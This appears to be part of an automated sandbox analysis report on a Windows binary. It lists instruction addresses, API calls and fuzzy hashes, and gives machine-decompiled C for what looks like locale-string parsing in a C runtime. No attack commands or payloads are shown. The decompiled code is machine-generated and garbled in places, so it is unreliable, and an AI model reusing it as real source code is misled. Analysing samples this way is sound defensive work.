                                                                                                0x0040f8b8
                                                                                                0x0040f8b8
                                                                                                0x0040f8bb
                                                                                                0x0040f8ce
                                                                                                0x0040f8ce
                                                                                                0x0040f8cf
                                                                                                0x0040f8bd
                                                                                                0x0040f8c6
                                                                                                0x0040f8c9
                                                                                                0x0040f8c9
                                                                                                0x0040f8d9
                                                                                                0x0040f8db
                                                                                                0x0040f8df
                                                                                                0x0040f8e4
                                                                                                0x0040f8e6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f8ea
                                                                                                0x0040f8ef
                                                                                                0x0040f8f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f8f5
                                                                                                0x0040f8f8
                                                                                                0x0040f8fa
                                                                                                0x0040f933
                                                                                                0x0040f933
                                                                                                0x0040f933
                                                                                                0x0040f937
                                                                                                0x00000000
                                                                                                0x0040f937
                                                                                                0x0040f8fc
                                                                                                0x0040f8fe
                                                                                                0x0040f902
                                                                                                0x0040f92e
                                                                                                0x00000000
                                                                                                0x0040f92e
                                                                                                0x0040f908
                                                                                                0x0040f90a
                                                                                                0x0040f90c
                                                                                                0x0040f929
                                                                                                0x00000000
                                                                                                0x0040f929
                                                                                                0x0040f913
                                                                                                0x0040f913
                                                                                                0x00000000
                                                                                                0x0040f8db
                                                                                                0x0040f80d
                                                                                                0x0040f815
                                                                                                0x0040f7ef
                                                                                                0x0040f7ef
                                                                                                0x0040f71b
                                                                                                0x0040f71b
                                                                                                0x00000000
                                                                                                0x0040f71b
                                                                                                0x0040f7d2
                                                                                                0x0040f7de
                                                                                                0x0040f7e3
                                                                                                0x0040f7e5
                                                                                                0x0040f7e8
                                                                                                0x0040f7eb
                                                                                                0x0040f7ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f7ed
                                                                                                0x0040f76b
                                                                                                0x0040f76b
                                                                                                0x0040f76d
                                                                                                0x0040f76d
                                                                                                0x0040f771
                                                                                                0x0040f773
                                                                                                0x0040f77a
                                                                                                0x0040f77a
                                                                                                0x0040f775
                                                                                                0x0040f775
                                                                                                0x0040f775
                                                                                                0x0040f77d
                                                                                                0x0040f77f
                                                                                                0x0040f782
                                                                                                0x0040f785
                                                                                                0x0040f785
                                                                                                0x0040f785
                                                                                                0x00000000
                                                                                                0x0040f76d
                                                                                                0x0040f716
                                                                                                0x0040f716
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 0040F188: SetLastError.KERNEL32(0000000D,0040F704,004604D4,00000000,?), ref: 0040F18E
                                                                                                • SetLastError.KERNEL32(000000C1,004604D4,00000000,?), ref: 0040F71B
                                                                                                • GetNativeSystemInfo.KERNEL32(?,004604D4,00000000,?), ref: 0040F78E
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7FA
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040F801
                                                                                                • SetLastError.KERNEL32(0000045A), ref: 0040F913
                                                                                                  • Part of subcall function 0040F698: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F81A,00000000,00000000,00008000,00000000), ref: 0040F6A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 486403682-0
                                                                                                • Opcode ID: 4f7efae13442c174d874a86dbca70fcdd373288cf4b395e8b490fd07e6231174
                                                                                                • Instruction ID: 99117d1bee9657b613627bb53c3b50fd4519fbc9ddf6da4b95ac4cc933d053df
                                                                                                • Opcode Fuzzy Hash: 4f7efae13442c174d874a86dbca70fcdd373288cf4b395e8b490fd07e6231174
                                                                                                • Instruction Fuzzy Hash: 4661F3B1A00201ABDB309F66CD81B6A77A5BF84704F14413BED04ABBC1D778DD5ACB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043F830, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 73%
                                                                                                			E0043F830(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E00440C6C(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43f02f
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x458510);
					_push( *0x4583cc);
					E0043F76F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x4583cc;
					while(1) {
						L2:
						_t244 = E00449457(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x458510);
							_push( *_t370);
							E0043F76F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x4583fc) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E004414D5(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E004414D5( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E004414D5( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E004414D5( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E004414D5( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00437736();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46c00c; // 0x4cc22724
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043F830(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E0043F3F8(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43f01f
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E0044A5B7(_t444, 0x458508);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x4583cc;
													_v460 = 1;
													do {
														_t266 = E0044A57D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x4583fc;
													} while (_t362 <= 0x4583fc);
													_t359 = _v472 + 2;
													_t267 = E0044A52D(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E00449599(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00437736();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46c00c; // 0x4cc22724
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00442F68(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E0043F3F8(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E00440C6C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb8bf
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E004428B4(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E00437736();
																					asm("int3");
																					_t293 =  *0x46d508; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E0043F105(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E0044A5FC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x458488, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E00434641( &_v536,  *0x46c160, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x4583c8; // 0x40ddd6
																					 *0x45449c(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46c298;
																						if(_t396 != 0x46c298) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E004414D5( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E004414D5( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb8bf
																								E004414D5( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb8bf
																						E004414D5( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E004414D5(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E00430A5B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E00430B8F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E00430A5B(_v12 ^ _t463);
					}
				}
				L130:
			}






































































































































                                                                                                0x0043f830
                                                                                                0x0043f833
                                                                                                0x0043f835
                                                                                                0x0043f838
                                                                                                0x0043f839
                                                                                                0x0043f842
                                                                                                0x0043f84a
                                                                                                0x0043f84c
                                                                                                0x0043f84e
                                                                                                0x0043f851
                                                                                                0x0043f96a
                                                                                                0x0043f96f
                                                                                                0x0043f857
                                                                                                0x0043f857
                                                                                                0x0043f858
                                                                                                0x0043f858
                                                                                                0x0043f85b
                                                                                                0x0043f85e
                                                                                                0x0043f860
                                                                                                0x0043f863
                                                                                                0x0043f863
                                                                                                0x0043f866
                                                                                                0x0043f868
                                                                                                0x0043f86b
                                                                                                0x0043f870
                                                                                                0x0043f87e
                                                                                                0x0043f888
                                                                                                0x0043f88b
                                                                                                0x0043f88e
                                                                                                0x0043f88e
                                                                                                0x0043f899
                                                                                                0x0043f89e
                                                                                                0x0043f8a3
                                                                                                0x00000000
                                                                                                0x0043f8a9
                                                                                                0x0043f8ac
                                                                                                0x0043f8ac
                                                                                                0x0043f8af
                                                                                                0x0043f8b1
                                                                                                0x0043f8b4
                                                                                                0x0043f8b4
                                                                                                0x0043f8b4
                                                                                                0x0043f8b6
                                                                                                0x0043f8b6
                                                                                                0x0043f8b6
                                                                                                0x0043f8bc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043f8c1
                                                                                                0x0043f8d8
                                                                                                0x0043f8d8
                                                                                                0x0043f8c3
                                                                                                0x0043f8c3
                                                                                                0x0043f8cb
                                                                                                0x00000000
                                                                                                0x0043f8cd
                                                                                                0x0043f8cd
                                                                                                0x0043f8d0
                                                                                                0x0043f8d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043f8d6
                                                                                                0x0043f8cb
                                                                                                0x0043f8e1
                                                                                                0x0043f8e6
                                                                                                0x0043f8e8
                                                                                                0x0043f8ed
                                                                                                0x0043f8f0
                                                                                                0x0043f8f3
                                                                                                0x0043f8f6
                                                                                                0x0043f8f9
                                                                                                0x0043f8fb
                                                                                                0x0043f900
                                                                                                0x0043f90a
                                                                                                0x0043f912
                                                                                                0x0043f91a
                                                                                                0x00000000
                                                                                                0x0043f920
                                                                                                0x0043f924
                                                                                                0x0043f971
                                                                                                0x0043f977
                                                                                                0x0043f97a
                                                                                                0x0043f97d
                                                                                                0x0043f97f
                                                                                                0x0043f983
                                                                                                0x0043f987
                                                                                                0x0043f989
                                                                                                0x0043f98c
                                                                                                0x0043f991
                                                                                                0x0043f987
                                                                                                0x0043f992
                                                                                                0x0043f995
                                                                                                0x0043f997
                                                                                                0x0043f999
                                                                                                0x0043f99d
                                                                                                0x0043f99e
                                                                                                0x0043f9a0
                                                                                                0x0043f9a3
                                                                                                0x0043f9a8
                                                                                                0x0043f99e
                                                                                                0x0043f9ab
                                                                                                0x0043f9ae
                                                                                                0x0043f9b1
                                                                                                0x0043f9b4
                                                                                                0x0043f9b7
                                                                                                0x0043f9b7
                                                                                                0x0043f926
                                                                                                0x0043f926
                                                                                                0x0043f929
                                                                                                0x0043f92c
                                                                                                0x0043f92e
                                                                                                0x0043f932
                                                                                                0x0043f936
                                                                                                0x0043f938
                                                                                                0x0043f93b
                                                                                                0x0043f940
                                                                                                0x0043f936
                                                                                                0x0043f941
                                                                                                0x0043f946
                                                                                                0x0043f948
                                                                                                0x0043f94d
                                                                                                0x0043f94f
                                                                                                0x0043f952
                                                                                                0x0043f957
                                                                                                0x0043f94d
                                                                                                0x0043f958
                                                                                                0x0043f95c
                                                                                                0x0043f95c
                                                                                                0x0043f95f
                                                                                                0x0043f963
                                                                                                0x0043f966
                                                                                                0x0043f966
                                                                                                0x00000000
                                                                                                0x0043f969
                                                                                                0x00000000
                                                                                                0x0043f91a
                                                                                                0x0043f8dc
                                                                                                0x0043f8de
                                                                                                0x0043f8de
                                                                                                0x00000000
                                                                                                0x0043f8de
                                                                                                0x0043f9be
                                                                                                0x0043f9bf
                                                                                                0x0043f9c0
                                                                                                0x0043f9c1
                                                                                                0x0043f9c2
                                                                                                0x0043f9c3
                                                                                                0x0043f9c8
                                                                                                0x0043f9cb
                                                                                                0x0043f9cc
                                                                                                0x0043f9ce
                                                                                                0x0043f9d4
                                                                                                0x0043f9db
                                                                                                0x0043f9de
                                                                                                0x0043f9e1
                                                                                                0x0043f9e2
                                                                                                0x0043f9e3
                                                                                                0x0043f9e6
                                                                                                0x0043f9e7
                                                                                                0x0043f9ea
                                                                                                0x0043f9f0
                                                                                                0x0043f9f2
                                                                                                0x0043fa17
                                                                                                0x0043fa21
                                                                                                0x0043fa27
                                                                                                0x0043fa29
                                                                                                0x0043fa2f
                                                                                                0x0043fa31
                                                                                                0x0043fc84
                                                                                                0x0043fc85
                                                                                                0x00000000
                                                                                                0x0043fa37
                                                                                                0x0043fa37
                                                                                                0x0043fa3b
                                                                                                0x0043fba2
                                                                                                0x0043fba2
                                                                                                0x0043fbb9
                                                                                                0x0043fbbe
                                                                                                0x0043fbc1
                                                                                                0x0043fbc3
                                                                                                0x0043fbc9
                                                                                                0x0043fbc9
                                                                                                0x0043fbcb
                                                                                                0x0043fbcb
                                                                                                0x0043fbce
                                                                                                0x0043fbd0
                                                                                                0x0043fbd6
                                                                                                0x0043fbd6
